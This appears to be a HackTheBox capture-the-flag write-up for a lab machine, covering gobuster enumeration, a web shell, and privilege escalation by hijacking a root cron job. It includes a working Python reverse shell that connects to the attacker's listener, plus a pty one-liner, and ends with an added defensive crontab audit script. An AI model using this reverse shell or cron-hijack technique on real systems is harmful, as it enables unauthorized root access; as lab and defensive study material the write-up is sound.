![f5864aceeefb1e406e4d5b393c89a357.png](68757d919950447c8a2723837615b2b4.png)

### Port Scanning, General Enumeration and Access (Nmap, Gobuster)

Initial scan showed that the only open port is 80 (HTTP).

![bd01656345ddccc0469e64d7205c7abb.png](a79611f0fb504d2c95e48ad41bf64257.png)

![521eab003e68c7b9b8c6a3165dbc004f.png](25a5af46355a4665aff1c3c562a5abbd.png)

Looks like a pretty neat tool, but not a lot to go on.

`gobuster dir -u http://10.10.10.68/ -w /dirs/small.txt -x php`

![d266d9b40f7d37741133d816aff27fa1.png](926805d2c0704027b5127fd161f124f3.png)

`/dev`?

![e5b7c370abcac44325316c5f01353d1b.png](374d569c5b8544ae9d52f43225a8d392.png)

Found the phpbash thing!

![04cfb0c08f8a0ae2506dc5ea7ee84763.png](a0955a0b22924187939aebd235886bb9.png)

![dcd444ca9a402a810ff2c121f584cee2.png](04f9bd6f06fe467fa56f7a7e2cc9c1d8.png)

---

### Privesc (php reverse shell, python, cronjobs)

We can upload files to the `/uploads` directory in the webroot.

![af313696df01e0877c0ea89ed433c427.png](0400838e70144b8eae257ac5820ddad8.png)

Let's get a real shell.

![4fd58a133be0cd2272fdb3ea3535e5cd.png](6a01483f603b47ab839df4876f952621.png)

`python3 -c 'import pty; pty.spawn("/bin/bash")'`

![c7e9f1b1827264ad792abbc841f4f553.png](c483f76f0a054e3fb5bc65db38e5b76d.png)

Easy enough to switch to `scriptmanager`:

`sudo -u scriptmanager /bin/bash`

There's a scripts folder owned by `scriptmanager`.

![1c2c10bf0ecdf6a2801ed07ec302db62.png](f59cdcfdc0884bc8b8fe0f0e38a86c5e.png)

![a54454783a3b57526f0f6f5b93f0c0c9.png](fb017495d2524ecfa59dfe3430afa544.png)

Interesting: the Python script is ours, but the text file is owned by root?

![e670daa3f4ef1ab447080a2c41002f16.png](5e05db701753482f846bcd7b28e075ed.png)

I see, so the script runs and creates that file.

![cc2964236f7d97d6178a37695e7b97ad.png](3fa0f82b6b8a424dbefdacbf740f2032.png)

Moving the old `test.txt` to `test.txt.bak` and re-running the script, we can see that the new `test.txt` is owned by us.
That leads me to believe that something with root privs ran it earlier. Maybe a cronjob? Let's test.

![ed04a1a4e3e0ecfeef9462cd91c806b7.png](39b94ffd44b24eb5bb7f06e45aa19ae4.png)

It's back, and with root privs! Let's give this boring old `test.py` some fangs.

```python
import socket, subprocess, os, pty

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.10.14.18", 4445))  # listener on the attacking machine
# point stdin, stdout and stderr of the spawned shell at the socket
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
pty.spawn("/bin/bash")
```

I created the new `test.py` on my machine and transferred it over. Started a listener and...

![7d8618f99e679389e24dacb08142d003.png](b3cf254ad72549119b33e1520bb5ab13.png)

![be41b9c05ca645b4855a45b650ee1279.png](4a95bcc9d69f47838d361634b7e1239a.png)

---

Back to [[HackTheBox Index]]

Tags: #gobuster #htb #cron #python #hackthebox #box_writeups

Related:
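The root cron job in this box runs a script out of a directory owned by `scriptmanager`, which is the whole privesc. As an added example that is not part of the original write-up, here is a small audit that flags that pattern in an `/etc/crontab`-style file. The sample crontab and the `FAKE_FS` ownership table are constructed so it runs offline; `lookup` is a pluggable function returning `(uid, mode)`, and on a live host a wrapper around `os.stat` would be passed instead of `FAKE_FS.get`.

```python
import os
import re
import stat
# Added defensive example, not from the original write-up: audit an
# /etc/crontab-style file for root jobs that reference a path a non-root
# user can change (here: root cron running test.py out of a directory
# owned by scriptmanager). lookup(path) returns (uid, mode) or None.

def parse_system_crontab(text):
    """Return (user, command) pairs; skips comments and VAR=value lines."""
    jobs = []
    for line in (ln.strip() for ln in text.splitlines()):
        if not line or line.startswith('#') or '=' in line.split()[0]:
            continue
        n = 2 if line.startswith('@') else 6  # @reboot etc. use one time field
        parts = line.split(None, n)
        if len(parts) == n + 1:
            jobs.append((parts[n - 1], parts[n]))
    return jobs

def writable_by_non_root(uid, mode):
    """Owned by a non-root uid, or group/world writable."""
    return uid != 0 or bool(mode & (stat.S_IWGRP | stat.S_IWOTH))

def audit_crontab(text, lookup):
    """List (referenced path, weak path, owner uid) for at-risk root jobs."""
    findings = []
    for user, cmd in parse_system_crontab(text):
        if user != 'root':
            continue
        for path in re.findall(r'/[^\s;&|"\']*', cmd):
            # check the path, then its directory: whoever owns the directory
            # can replace the file even when the file itself belongs to root
            for p in (path, os.path.dirname(path)):
                info = lookup(p)
                if info and writable_by_non_root(*info):
                    findings.append((path, p, info[0]))
                    break
    return findings

# Constructed sample crontab and ownership table so this runs offline; on a
# live host pass a wrapper around os.stat as lookup instead of FAKE_FS.get.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
17 * * * * root cd / && run-parts --report /etc/cron.hourly
* * * * * root cd /scripts; for f in /scripts/*.py; do python3 "$f"; done
"""
FAKE_FS = {'/': (0, 0o40755), '/etc': (0, 0o40755), '/etc/cron.hourly': (0, 0o40755),
           '/scripts': (1001, 0o40755)}  # owned by scriptmanager, not root
```

`audit_crontab(SAMPLE_CRONTAB, FAKE_FS.get)` reports `/scripts` (and anything under it) as modifiable by uid 1001, while the `run-parts` job passes.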